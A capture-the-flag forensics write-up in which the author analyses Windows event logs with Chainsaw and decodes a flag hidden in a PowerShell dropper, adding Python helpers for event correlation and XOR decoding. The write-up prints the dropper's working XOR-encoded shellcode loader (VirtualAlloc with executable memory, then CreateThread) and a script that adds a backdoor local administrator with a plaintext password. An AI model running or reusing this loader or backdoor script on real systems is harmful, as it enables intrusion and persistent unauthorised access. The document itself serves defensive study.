In this challenge we are given a bunch of evtx (Microsoft Event Viewer) log files. At the beginning I didn't know how to work with this type of log file; however, after some googling I found this amazing post.
This post suggests using a tool named Chainsaw, so that's what I did. After some tries, I came up with the following command:
./chainsaw hunt ~/CTF/CyberApocalypse2022/Puppeteer/Logs/ --rules sigma_rules/ --mapping mapping_files/sigma-mapping.yml --full --lateral-all
As we can see, this tool generates a report based on the log files:
By F-Secure Countercept (@FranticTyping, @AlexKornitzer)
[+] Found 143 EVTX files
[+] Converting detection rules...
[+] Loaded 868 detection rules (92 were not loaded)
[+] Hunting: [========================================] 143/143
[+] Detection: (External Rule) - Suspicious Powershell ScriptBlock
┌─────────────────────┬──────┬──────────────────────────────────┬───────────────┬─────────────────────────────────┐
│ system_time         │ id   │ detection_rules                  │ computer_name │ Event.EventData.ScriptBlockText │
├─────────────────────┼──────┼──────────────────────────────────┼───────────────┼─────────────────────────────────┤
│ 2022-05-06 15:40:31 │ 4104 │ ‣ Accessing WinAPI in PowerShell │ "Council-HQ"  │ (script block 1, listed below)  │
├─────────────────────┼──────┼──────────────────────────────────┼───────────────┼─────────────────────────────────┤
│ 2022-05-06 15:43:51 │ 4104 │ ‣ PowerShell Create Local User   │ "Council-HQ"  │ (script block 2, listed below)  │
└─────────────────────┴──────┴──────────────────────────────────┴───────────────┴─────────────────────────────────┘
Script block 1 (2022-05-06 15:40:31), exactly as the report shows it, on a single line:
$OleSPrlmhB = @"[DllImport("kernel32.dll")]public static extern IntPtr VirtualAlloc(IntPtr lpAddress, uint dwSize, uint flAllocationType, uint flProtect);[DllImport("kernel32.dll")]public static extern IntPtr CreateThread(IntPtr lpThreadAttributes, uint dwStackSize, IntPtr lpStartAddress, IntPtr lpParameter, uint dwCreationFlags, IntPtr lpThreadId);"@[byte[]] $stage1 = 0x99, 0x85, 0x93, 0xaa, 0xb3, 0xe2, 0xa6, 0xb9, 0xe5, 0xa3, 0xe2, 0x8e, 0xe1, 0xb7, 0x8e, 0xa5, 0xb9, 0xe2, 0x8e, 0xb3;[byte[]] $stage2 = 0xac, 0xff, 0xff, 0xff, 0xe2, 0xb2, 0xe0, 0xa5, 0xa2, 0xa4, 0xbb, 0x8e, 0xb7, 0xe1, 0x8e, 0xe4, 0xa5, 0xe1, 0xe1;$tNZvQCljVk = Add-Type -memberDefinition $OleSPrlmhB -Name "Win32" -namespace Win32Functions -passthru;[Byte[]] $HVOASfFuNSxRXR = 0x2d,0x99,0x52,0x35,0x21,0x39,0x1d,0xd1,0xd1,0xd1,0x90,0x80,0x90,0x81,0x83,0x99,0xe0,0x03,0xb4,0x99,0x5a,0x83,0xb1,0x99,0x5a,0x83,0xc9,0x80,0x87,0x99,0x5a,0x83,0xf1,0x99,0xde,0x66,0x9b,0x9b,0x9c,0xe0,0x18,0x99,0x5a,0xa3,0x81,0x99,0xe0,0x11,0x7d,0xed,0xb0,0xad,0xd3,0xfd,0xf1,0x90,0x10,0x18,0xdc,0x90,0xd0,0x10,0x33,0x3c,0x83,0x99,0x5a,0x83,0xf1,0x90,0x80,0x5a,0x93,0xed,0x99,0xd0,0x01,0xb7,0x50,0xa9,0xc9,0xda,0xd3,0xde,0x54,0xa3,0xd1,0xd1,0xd1,0x5a,0x51,0x59,0xd1,0xd1,0xd1,0x99,0x54,0x11,0xa5,0xb6,0x99,0xd0,0x01,0x5a,0x99,0xc9,0x81,0x95,0x5a,0x91,0xf1,0x98,0xd0,0x01,0x32,0x87,0x99,0x2e,0x18,0x9c,0xe0,0x18,0x90,0x5a,0xe5,0x59,0x99,0xd0,0x07,0x99,0xe0,0x11,0x90,0x10,0x18,0xdc,0x7d,0x90,0xd0,0x10,0xe9,0x31,0xa4,0x20,0x9d,0xd2,0x9d,0xf5,0xd9,0x94,0xe8,0x00,0xa4,0x09,0x89,0x95,0x5a,0x91,0xf5,0x98,0xd0,0x01,0xb7,0x90,0x5a,0xdd,0x99,0x95,0x5a,0x91,0xcd,0x98,0xd0,0x01,0x90,0x5a,0xd5,0x59,0x90,0x89,0x90,0x89,0x8f,0x88,0x99,0xd0,0x01,0x8b,0x90,0x89,0x90,0x88,0x90,0x8b,0x99,0x52,0x3d,0xf1,0x90,0x83,0x2e,0x31,0x89,0x90,0x88,0x8b,0x99,0x5a,0xc3,0x38,0x9a,0x2e,0x2e,0x2e,0x8c,0x98,0x6f,0xa6,0xa2,0xe3,0x8e,0xe2,0xe3,0xd1,0xd1,0x90,0x87,0x98,0x58,0x37,0x99,0x50,0x3d,0x71,0xd0,0xd1,0xd1,0x98,0x58,0x34,0x98,0x6d,0xd3,0xd1,0xd4,0xe8,0x11,0x79,0xd1,0xc3,0x90,0x85,0x98,0x58,0x35,0x9d,0x58,0x20,0x90,0x6b,0x9d,0xa6,0xf7,0xd6,0x2e,0x04,0x9d,0x58,0x3b,0xb9,0xd0,0xd0,0xd1,0xd1,0x88,0x90,0x6b,0xf8,0x51,0xba,0xd1,0x2e,0x04,0xbb,0xdb,0x90,0x8f,0x81,0x81,0x9c,0xe0,0x18,0x9c,0xe0,0x11,0x99,0x2e,0x11,0x99,0x58,0x13,0x99,0x2e,0x11,0x99,0x58,0x10,0x90,0x6b,0x3b,0xde,0x0e,0x31,0x2e,0x04,0x99,0x58,0x16,0xbb,0xc1,0x90,0x89,0x9d,0x58,0x33,0x99,0x58,0x28,0x90,0x6b,0x48,0x74,0xa5,0xb0,0x2e,0x04,0x54,0x11,0xa5,0xdb,0x98,0x2e,0x1f,0xa4,0x34,0x39,0x42,0xd1,0xd1,0xd1,0x99,0x52,0x3d,0xc1,0x99,0x58,0x33,0x9c,0xe0,0x18,0xbb,0xd5,0x90,0x89,0x99,0x58,0x28,0x90,0x6b,0xd3,0x08,0x19,0x8e,0x2e,0x04,0x52,0x29,0xd1,0xaf,0x84,0x99,0x52,0x15,0xf1,0x8f,0x58,0x27,0xbb,0x91,0x90,0x88,0xb9,0xd1,0xc1,0xd1,0xd1,0x90,0x89,0x99,0x58,0x23,0x99,0xe0,0x18,0x90,0x6b,0x89,0x75,0x82,0x34,0x2e,0x04,0x99,0x58,0x12,0x98,0x58,0x16,0x9c,0xe0,0x18,0x98,0x58,0x21,0x99,0x58,0x0b,0x99,0x58,0x28,0x90,0x6b,0xd3,0x08,0x19,0x8e,0x2e,0x04,0x52,0x29,0xd1,0xac,0xf9,0x89,0x90,0x86,0x88,0xb9,0xd1,0x91,0xd1,0xd1,0x90,0x89,0xbb,0xd1,0x8b,0x90,0x6b,0xda,0xfe,0xde,0xe1,0x2e,0x04,0x86,0x88,0x90,0x6b,0xa4,0xbf,0x9c,0xb0,0x2e,0x04,0x98,0x2e,0x1f,0x38,0xed,0x2e,0x2e,0x2e,0x99,0xd0,0x12,0x99,0xf8,0x17,0x99,0x54,0x27,0xa4,0x65,0x90,0x2e,0x36,0x89,0xbb,0xd1,0x88,0x98,0x16,0x13,0x21,0x64,0x73,0x87,0x2e,0x04;[array]::Reverse($stage2);$hRffYLENA = $tNZvQCljVk::VirtualAlloc(0,[Math]::Max($HVOASfFuNSxRXR.Length,0x1000),0x3000,0x40);$stage3 = $stage1 + $stage2;[System.Runtime.InteropServices.Marshal]::Copy($HVOASfFuNSxRXR,0,$hRffYLENA,$HVOASfFuNSxRXR.Length);# Unpack Shellcode;for($i=0; $i -lt $HVOASfFuNSxRXR.count ; $i++){ $HVOASfFuNSxRXR[$i] = $HVOASfFuNSxRXR[$i] -bxor 0xd1;}#Unpack Special Orders!for($i=0;$i -lt $stage3.count;$i++){ $stage3[$i] = $stage3[$i] -bxor 0xd1;}$tNZvQCljVk::CreateThread(0,0,$hRffYLENA,0,0,0);
Script block 2 (2022-05-06 15:43:51), with the line breaks that the table flattened put back:
# Create a new task action
$taskAction = New-ScheduledTaskAction -Execute 'powershell.exe';
$taskTrigger = New-ScheduledTaskTrigger -Daily -At 3PM;
# The name of your scheduled task.
$taskName = "Elevate Powers"
# Describe the scheduled task.
$description = "Steal weapons"
# Register the scheduled task
Register-ScheduledTask -TaskName $taskName -Action $taskAction -Trigger $taskTrigger -Description $description
# Create a new task action
$taskAction = New-ScheduledTaskAction -Execute 'powershell.exe';
$taskTrigger = New-ScheduledTaskTrigger -Daily -At 3PM;
# The name of your scheduled task.
$taskName = "Sabotage Miyuki"
# Describe the scheduled task.
$description = "Bypass Arms Embargo"
# Register the scheduled task
Register-ScheduledTask -TaskName $taskName -Action $taskAction -Trigger $taskTrigger -Description $description
#start windows update service
Get-Service -Name wuauserv | Start-Service -Verbose
#delete childs
Get-ChildItem "C:\Windows\SoftwareDistribution\*" -Recurse -Force -Verbose -ErrorAction SilentlyContinue | remove-item -force -Verbose -recurse -ErrorAction SilentlyContinue
#clear temp folder
Get-ChildItem "C:\users\*\AppData\Local\Temp\*" -Recurse -Force -ErrorAction SilentlyContinue |Where-Object { ($_.CreationTime -lt $(Get-Date).AddDays(-$DaysToDelete))} |remove-item -force -Verbose -recurse -ErrorAction SilentlyContinue
cleanmgr /sagerun:12
do {"waiting for cleanmgr to complete. . ."
start-sleep 5} while ((get-wmiobject win32_process | where-object {$_.processname -eq ‘cleanmgr.exe’} | measure).count)
# Create Admin Account
function Create-NewLocalAdmin {
    [CmdletBinding()]
    param (
        [string] $NewLocalAdmin,
        [securestring] $Password
    )
    begin { }
    process {
        New-LocalUser "$NewLocalAdmin" -Password $Password -FullName "$NewLocalAdmin" -Description "Temporary local admin"
        Write-Verbose "$NewLocalAdmin local user crated"
        Add-LocalGroupMember -Group "Administrators" -Member "$NewLocalAdmin"
        Write-Verbose "$NewLocalAdmin added to the local administrator group"
    }
    end { }
}
$NewLocalAdmin = "backup_op";
$Password = ConvertTo-SecureString "sup3rk3y" -AsPlainText -Force;
Create-NewLocalAdmin -NewLocalAdmin $NewLocalAdmin -Password $Password
[+] Detection: (Built-in Logic) - Windows Defender Detections
┌─────────────────────┬──────┬──────────────┬────────────────────────────────────────┬────────────────────────────────────────┬──────────────────────────────┐
│ system_time         │ id   │ computer     │ threat_name                            │ threat_file                            │ user                         │
├─────────────────────┼──────┼──────────────┼────────────────────────────────────────┼────────────────────────────────────────┼──────────────────────────────┤
│ 2022-05-06 15:40:17 │ 1116 │ "Council-HQ" │ "TrojanDropper:PowerShell/Ploty.gen!A" │ "amsi:_C:\\sysmgr\\special_orders.ps1" │ "Council-HQ\\Council Leader" │
└─────────────────────┴──────┴──────────────┴────────────────────────────────────────┴────────────────────────────────────────┴──────────────────────────────┘
[+] Detection: (Built-in Logic) - New User Created
┌─────────────────────┬──────┬───────────────────┬──────────────────────┬─────────────────────────────────────────────────┐
│ system_time         │ id   │ computer          │ target_username      │ user_sid                                        │
├─────────────────────┼──────┼───────────────────┼──────────────────────┼─────────────────────────────────────────────────┤
│ 2022-05-06 15:23:59 │ 4720 │ "Council-HQ"      │ "Council Leader"     │ "S-1-5-21-2389065719-3342106636-307857974-1001" │
├─────────────────────┼──────┼───────────────────┼──────────────────────┼─────────────────────────────────────────────────┤
│ 2022-05-06 15:29:00 │ 4720 │ "Council-HQ"      │ "sysadm"             │ "S-1-5-21-2389065719-3342106636-307857974-1002" │
├─────────────────────┼──────┼───────────────────┼──────────────────────┼─────────────────────────────────────────────────┤
│ 2022-05-06 15:44:04 │ 4720 │ "Council-HQ"      │ "backup_op"          │ "S-1-5-21-2389065719-3342106636-307857974-1003" │
├─────────────────────┼──────┼───────────────────┼──────────────────────┼─────────────────────────────────────────────────┤
│ 2022-05-07 01:19:36 │ 4720 │ "WIN-GE1PLB8KFNS" │ "WDAGUtilityAccount" │ "S-1-5-21-2389065719-3342106636-307857974-504"  │
├─────────────────────┼──────┼───────────────────┼──────────────────────┼─────────────────────────────────────────────────┤
│ 2022-05-07 01:20:58 │ 4720 │ "DESKTOP-DBOP9M0" │ "defaultuser0"       │ "S-1-5-21-2389065719-3342106636-307857974-1000" │
└─────────────────────┴──────┴───────────────────┴──────────────────────┴─────────────────────────────────────────────────┘
[+] Detection: (Built-in Logic) - User added to interesting group
┌─────────────────────┬──────┬───────────────────┬───────────────────────────┬─────────────────────────────────────────────────┬──────────────────┐
│ system_time         │ id   │ computer          │ change_type               │ user_sid                                        │ target_group     │
├─────────────────────┼──────┼───────────────────┼───────────────────────────┼─────────────────────────────────────────────────┼──────────────────┤
│ 2022-05-06 15:20:57 │ 4732 │ "DESKTOP-DBOP9M0" │ User added to local group │ "S-1-5-21-2389065719-3342106636-307857974-1000" │ "Administrators" │
├─────────────────────┼──────┼───────────────────┼───────────────────────────┼─────────────────────────────────────────────────┼──────────────────┤
│ 2022-05-06 15:23:59 │ 4732 │ "Council-HQ"      │ User added to local group │ "S-1-5-21-2389065719-3342106636-307857974-1001" │ "Administrators" │
├─────────────────────┼──────┼───────────────────┼───────────────────────────┼─────────────────────────────────────────────────┼──────────────────┤
│ 2022-05-06 15:29:07 │ 4732 │ "Council-HQ"      │ User added to local group │ "S-1-5-21-2389065719-3342106636-307857974-1002" │ "Administrators" │
├─────────────────────┼──────┼───────────────────┼───────────────────────────┼─────────────────────────────────────────────────┼──────────────────┤
│ 2022-05-06 15:44:04 │ 4732 │ "Council-HQ"      │ User added to local group │ "S-1-5-21-2389065719-3342106636-307857974-1003" │ "Administrators" │
└─────────────────────┴──────┴───────────────────┴───────────────────────────┴─────────────────────────────────────────────────┴──────────────────┘
[+] 12 Detections found
If we analyze the report, we can see that a 'TrojanDropper' has been spotted on the 'Council-HQ' computer under the 'Council Leader' user. The threat file seems to be a Powershell script and, if we look at the top of the report, we can find a very suspicious Powershell script block logged on 'Council-HQ', the same computer that was infected.
If we fix the formatting of the Powershell script, we end up with the following:
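The "New User Created" and "User added to interesting group" tables tell the same story from the account side: an account is created (event 4720) and seconds later its SID lands in Administrators (event 4732), which is exactly what the logged Create-NewLocalAdmin function does. The following is an added example of mine, not part of the original write-up or of Chainsaw, that joins the two tables on the SID within a short time window. The rows are copied from the report above; the 5-minute window and the skipping of a 4732 that predates its 4720 are my own choices.

```python
# Added example (not from the original write-up): correlate the 4720 (account
# created) and 4732 (member added to a local group) rows of the Chainsaw report
# to find accounts that became local admins right after creation.
from datetime import datetime, timedelta

TS_FORMAT = "%Y-%m-%d %H:%M:%S"

# Rows copied from the "New User Created" table in the report:
# (system_time, event id, computer, target_username, user_sid)
NEW_USER_EVENTS = [
    ("2022-05-06 15:23:59", 4720, "Council-HQ", "Council Leader",
     "S-1-5-21-2389065719-3342106636-307857974-1001"),
    ("2022-05-06 15:29:00", 4720, "Council-HQ", "sysadm",
     "S-1-5-21-2389065719-3342106636-307857974-1002"),
    ("2022-05-06 15:44:04", 4720, "Council-HQ", "backup_op",
     "S-1-5-21-2389065719-3342106636-307857974-1003"),
    ("2022-05-07 01:19:36", 4720, "WIN-GE1PLB8KFNS", "WDAGUtilityAccount",
     "S-1-5-21-2389065719-3342106636-307857974-504"),
    ("2022-05-07 01:20:58", 4720, "DESKTOP-DBOP9M0", "defaultuser0",
     "S-1-5-21-2389065719-3342106636-307857974-1000"),
]

# Rows copied from the "User added to interesting group" table in the report:
# (system_time, event id, computer, user_sid, target_group)
GROUP_ADD_EVENTS = [
    ("2022-05-06 15:20:57", 4732, "DESKTOP-DBOP9M0",
     "S-1-5-21-2389065719-3342106636-307857974-1000", "Administrators"),
    ("2022-05-06 15:23:59", 4732, "Council-HQ",
     "S-1-5-21-2389065719-3342106636-307857974-1001", "Administrators"),
    ("2022-05-06 15:29:07", 4732, "Council-HQ",
     "S-1-5-21-2389065719-3342106636-307857974-1002", "Administrators"),
    ("2022-05-06 15:44:04", 4732, "Council-HQ",
     "S-1-5-21-2389065719-3342106636-307857974-1003", "Administrators"),
]


def parse_ts(value: str) -> datetime:
    return datetime.strptime(value, TS_FORMAT)


def correlate_new_admins(new_users, group_adds, window=timedelta(minutes=5),
                         group="Administrators"):
    """Return (username, sid, computer, created_at, added_at, seconds) for every
    account whose 4720 event is followed, within `window`, by a 4732 event that
    adds the same SID to `group`.

    Joining on the SID rather than the account name avoids false matches from
    renamed or re-created accounts.  A 4732 that predates the 4720 for the same
    SID (the defaultuser0 rows above) cannot be a post-creation elevation, so
    it is skipped rather than reported with a negative delay.
    """
    created = {}
    for ts, event_id, computer, name, sid in new_users:
        if event_id == 4720:
            created[sid] = (parse_ts(ts), computer, name)

    hits = []
    for ts, event_id, computer, sid, target_group in group_adds:
        if event_id != 4732 or target_group != group or sid not in created:
            continue
        created_at, _, name = created[sid]
        delta = parse_ts(ts) - created_at
        if timedelta(0) <= delta <= window:
            hits.append((name, sid, computer, created_at.strftime(TS_FORMAT),
                         ts, int(delta.total_seconds())))
    return hits


if __name__ == "__main__":
    for name, sid, computer, created_at, added_at, secs in correlate_new_admins(
            NEW_USER_EVENTS, GROUP_ADD_EVENTS):
        print(f"{computer}: {name!r} ({sid}) created {created_at}, "
              f"added to Administrators at {added_at} (+{secs}s)")
```

Run against the report's rows this flags Council Leader, sysadm and backup_op on Council-HQ (0 s, 7 s and 0 s between creation and group membership); tightening the window to a few seconds drops sysadm, and defaultuser0 is never reported because its 4732 comes before its 4720.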
# P/Invoke signatures for VirtualAlloc and CreateThread from kernel32.dll
$OleSPrlmhB = @"
[DllImport("kernel32.dll")]public static extern IntPtr VirtualAlloc(IntPtr lpAddress, uint dwSize, uint flAllocationType, uint flProtect);
[DllImport("kernel32.dll")]public static extern IntPtr CreateThread(IntPtr lpThreadAttributes, uint dwStackSize, IntPtr lpStartAddress, IntPtr lpParameter, uint dwCreationFlags, IntPtr lpThreadId);
"@
[byte[]] $stage1 = 0x99, 0x85, 0x93, 0xaa, 0xb3, 0xe2, 0xa6, 0xb9, 0xe5, 0xa3, 0xe2, 0x8e, 0xe1, 0xb7, 0x8e, 0xa5, 0xb9, 0xe2, 0x8e, 0xb3;
[byte[]] $stage2 = 0xac, 0xff, 0xff, 0xff, 0xe2, 0xb2, 0xe0, 0xa5, 0xa2, 0xa4, 0xbb, 0x8e, 0xb7, 0xe1, 0x8e, 0xe4, 0xa5, 0xe1, 0xe1;
$tNZvQCljVk = Add-Type -memberDefinition $OleSPrlmhB -Name "Win32" -namespace Win32Functions -passthru;
# XOR-encoded shellcode buffer
[byte[]] $HVOASfFuNSxRXR = 0x2d,0x99,0x52,0x35,0x21,0x39,0x1d,0xd1,0xd1,0xd1,0x90,0x80,0x90,0x81,0x83,0x99,0xe0,0x03,0xb4,0x99,0x5a,0x83,0xb1,0x99,0x5a,0x83,0xc9,0x80,0x87,0x99,0x5a,0x83,0xf1,0x99,0xde,0x66,0x9b,0x9b,0x9c,0xe0,0x18,0x99,0x5a,0xa3,0x81,0x99,0xe0,0x11,0x7d,0xed,0xb0,0xad,0xd3,0xfd,0xf1,0x90,0x10,0x18,0xdc,0x90,0xd0,0x10,0x33,0x3c,0x83,0x99,0x5a,0x83,0xf1,0x90,0x80,0x5a,0x93,0xed,0x99,0xd0,0x01,0xb7,0x50,0xa9,0xc9,0xda,0xd3,0xde,0x54,0xa3,0xd1,0xd1,0xd1,0x5a,0x51,0x59,0xd1,0xd1,0xd1,0x99,0x54,0x11,0xa5,0xb6,0x99,0xd0,0x01,0x5a,0x99,0xc9,0x81,0x95,0x5a,0x91,0xf1,0x98,0xd0,0x01,0x32,0x87,0x99,0x2e,0x18,0x9c,0xe0,0x18,0x90,0x5a,0xe5,0x59,0x99,0xd0,0x07,0x99,0xe0,0x11,0x90,0x10,0x18,0xdc,0x7d,0x90,0xd0,0x10,0xe9,0x31,0xa4,0x20,0x9d,0xd2,0x9d,0xf5,0xd9,0x94,0xe8,0x00,0xa4,0x09,0x89,0x95,0x5a,0x91,0xf5,0x98,0xd0,0x01,0xb7,0x90,0x5a,0xdd,0x99,0x95,0x5a,0x91,0xcd,0x98,0xd0,0x01,0x90,0x5a,0xd5,0x59,0x90,0x89,0x90,0x89,0x8f,0x88,0x99,0xd0,0x01,0x8b,0x90,0x89,0x90,0x88,0x90,0x8b,0x99,0x52,0x3d,0xf1,0x90,0x83,0x2e,0x31,0x89,0x90,0x88,0x8b,0x99,0x5a,0xc3,0x38,0x9a,0x2e,0x2e,0x2e,0x8c,0x98,0x6f,0xa6,0xa2,0xe3,0x8e,0xe2,0xe3,0xd1,0xd1,0x90,0x87,0x98,0x58,0x37,0x99,0x50,0x3d,0x71,0xd0,0xd1,0xd1,0x98,0x58,0x34,0x98,0x6d,0xd3,0xd1,0xd4,0xe8,0x11,0x79,0xd1,0xc3,0x90,0x85,0x98,0x58,0x35,0x9d,0x58,0x20,0x90,0x6b,0x9d,0xa6,0xf7,0xd6,0x2e,0x04,0x9d,0x58,0x3b,0xb9,0xd0,0xd0,0xd1,0xd1,0x88,0x90,0x6b,0xf8,0x51,0xba,0xd1,0x2e,0x04,0xbb,0xdb,0x90,0x8f,0x81,0x81,0x9c,0xe0,0x18,0x9c,0xe0,0x11,0x99,0x2e,0x11,0x99,0x58,0x13,0x99,0x2e,0x11,0x99,0x58,0x10,0x90,0x6b,0x3b,0xde,0x0e,0x31,0x2e,0x04,0x99,0x58,0x16,0xbb,0xc1,0x90,0x89,0x9d,0x58,0x33,0x99,0x58,0x28,0x90,0x6b,0x48,0x74,0xa5,0xb0,0x2e,0x04,0x54,0x11,0xa5,0xdb,0x98,0x2e,0x1f,0xa4,0x34,0x39,0x42,0xd1,0xd1,0xd1,0x99,0x52,0x3d,0xc1,0x99,0x58,0x33,0x9c,0xe0,0x18,0xbb,0xd5,0x90,0x89,0x99,0x58,0x28,0x90,0x6b,0xd3,0x08,0x19,0x8e,0x2e,0x04,0x52,0x29,0xd1,0xaf,0x84,0x99,0x52,0x15,0xf1,0x8f,0x58,0x27,0xbb,0x91,0x90,0x88,0xb9,0xd1,0xc1,0xd1,0xd1,0x90,0x89,0x99,0x58,0x23,0x99,0xe0,0x18,0x90,0x6b,0x89,0x75,0x82,0x34,0x2e,0x04,0x99,0x58,0x12,0x98,0x58,0x16,0x9c,0xe0,0x18,0x98,0x58,0x21,0x99,0x58,0x0b,0x99,0x58,0x28,0x90,0x6b,0xd3,0x08,0x19,0x8e,0x2e,0x04,0x52,0x29,0xd1,0xac,0xf9,0x89,0x90,0x86,0x88,0xb9,0xd1,0x91,0xd1,0xd1,0x90,0x89,0xbb,0xd1,0x8b,0x90,0x6b,0xda,0xfe,0xde,0xe1,0x2e,0x04,0x86,0x88,0x90,0x6b,0xa4,0xbf,0x9c,0xb0,0x2e,0x04,0x98,0x2e,0x1f,0x38,0xed,0x2e,0x2e,0x2e,0x99,0xd0,0x12,0x99,0xf8,0x17,0x99,0x54,0x27,0xa4,0x65,0x90,0x2e,0x36,0x89,0xbb,0xd1,0x88,0x98,0x16,0x13,0x21,0x64,0x73,0x87,0x2e,0x04;
# stage2 is reversed in place before it is appended to stage1
[array]::Reverse($stage2);
# 0x3000 = MEM_COMMIT | MEM_RESERVE, 0x40 = PAGE_EXECUTE_READWRITE
$hRffYLENA = $tNZvQCljVk::VirtualAlloc(0,[Math]::Max($HVOASfFuNSxRXR.Length,0x1000),0x3000,0x40);
$stage3 = $stage1 + $stage2;
[System.Runtime.InteropServices.Marshal]::Copy($HVOASfFuNSxRXR,0,$hRffYLENA,$HVOASfFuNSxRXR.Length);
# Unpack Shellcode; (single-byte XOR with key 0xd1)
for($i=0; $i -lt $HVOASfFuNSxRXR.count ; $i++)
{
$HVOASfFuNSxRXR[$i] = $HVOASfFuNSxRXR[$i] -bxor 0xd1;
}
#Unpack Special Orders! (same XOR key applied to stage3)
for($i=0;$i -lt $stage3.count;$i++)
{
$stage3[$i] = $stage3[$i] -bxor 0xd1;
}
# run the copied buffer on a new thread
$tNZvQCljVk::CreateThread(0,0,$hRffYLENA,0,0,0);
After taking a look at this script, we can make the following observations:
- There are three strange byte arrays in the code: stage1, stage2 and HVOASfFuNSxRXR.
- stage1 and stage2 are concatenated to create stage3.
- After this concatenation, HVOASfFuNSxRXR and stage3 are 'decoded' using a bitwise XOR with the hex value 0xd1.
Once we have discovered this, we can proceed to manually decode the byte arrays. To achieve this goal, I opened a Powershell prompt and replicated the loops in the code.
- HVOASfFuNSxRXR byte array:
We can't see the full output on the screenshot but, sadly, if we convert the decimal values into ASCII we don't have anything readable here.
- stage3 byte array:
In this case we have the following output:
72 84 66 123 98 51 119 104 52 114 51 95 48 102 95 116 104 51 95 98 125 46 46 46 51 99 49 116 115 117 106 95 102 48 95 53 116 48 48
If we turn these decimal values into ASCII, we'll see something that looks very much like a flag; we just need to reverse the second half of the string!
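The same unpacking can be replayed outside a Powershell prompt. The following is an added example of mine, not part of the original write-up, that reproduces the script's handling of stage1 and stage2 in Python: the two byte arrays are copied from the script above, `xor_decode` is the `-bxor 0xd1` loop, and `unpack_stage3` rebuilds stage3 either faithfully (with the `[array]::Reverse($stage2)` step, which is why the second half comes out backwards when only the loops are replayed) or without it, which yields the decimal dump shown above. It goes one step beyond the script by also recovering the XOR key from the expected `HTB{` prefix instead of reading it off the code, which is the usual trick when the key is not sitting in plain sight; `recover_xor_key` is my own helper name.

```python
# Added example (not from the original write-up): replay the dropper's
# unpacking of $stage1/$stage2 and derive the single-byte XOR key from a
# known plaintext prefix.
from typing import Optional

XOR_KEY = 0xD1  # key used by both "-bxor 0xd1" loops in the logged script

# Byte arrays copied from the logged script block ($stage1 and $stage2).
STAGE1 = bytes([0x99, 0x85, 0x93, 0xaa, 0xb3, 0xe2, 0xa6, 0xb9, 0xe5, 0xa3,
                0xe2, 0x8e, 0xe1, 0xb7, 0x8e, 0xa5, 0xb9, 0xe2, 0x8e, 0xb3])
STAGE2 = bytes([0xac, 0xff, 0xff, 0xff, 0xe2, 0xb2, 0xe0, 0xa5, 0xa2, 0xa4,
                0xbb, 0x8e, 0xb7, 0xe1, 0x8e, 0xe4, 0xa5, 0xe1, 0xe1])


def xor_decode(data: bytes, key: int) -> bytes:
    """Equivalent of the script's 'for ... $x[$i] -bxor 0xd1' loop."""
    return bytes(b ^ key for b in data)


def unpack_stage3(stage1: bytes, stage2: bytes, key: int = XOR_KEY,
                  reverse_stage2: bool = True) -> bytes:
    """Rebuild $stage3 the way the script does.

    The script calls [array]::Reverse($stage2) before concatenating, so the
    faithful order is reverse -> concatenate -> XOR.  reverse_stage2=False
    reproduces what the write-up got by replaying only the XOR loops: a
    string whose second half is backwards.
    """
    s2 = stage2[::-1] if reverse_stage2 else stage2
    return xor_decode(stage1 + s2, key)


def as_decimals(data: bytes) -> list:
    """The decimal dump PowerShell prints when a [byte[]] is echoed."""
    return list(data)


def recover_xor_key(data: bytes, known_prefix: bytes) -> Optional[int]:
    """Derive a single-byte XOR key from a known-plaintext prefix.

    Every prefix position must agree on the same key byte; if they do not,
    the data is not single-byte XOR (or the guessed prefix is wrong) and
    None is returned instead of a misleading key.
    """
    if not known_prefix or len(data) < len(known_prefix):
        return None
    candidates = {c ^ p for c, p in zip(data, known_prefix)}
    return candidates.pop() if len(candidates) == 1 else None


if __name__ == "__main__":
    key = recover_xor_key(STAGE1, b"HTB{")
    if key is None:
        raise SystemExit("prefix does not fit a single-byte XOR")
    print(f"recovered key : {key:#x}")
    half_reversed = unpack_stage3(STAGE1, STAGE2, key, reverse_stage2=False)
    print("XOR loops only:", as_decimals(half_reversed))
    print("XOR loops only:", half_reversed.decode())
    print("with reverse  :", unpack_stage3(STAGE1, STAGE2, key).decode())
```

Running it prints the same 39 decimal values the Powershell prompt gave and, with the reverse step applied, the flag with its second half the right way round. The key recovery works here because all four bytes of `HTB{` agree on 0xd1; a multi-byte or rolling key would make `recover_xor_key` return None, which is the cue to look at the script's loop more closely rather than trust a guessed key.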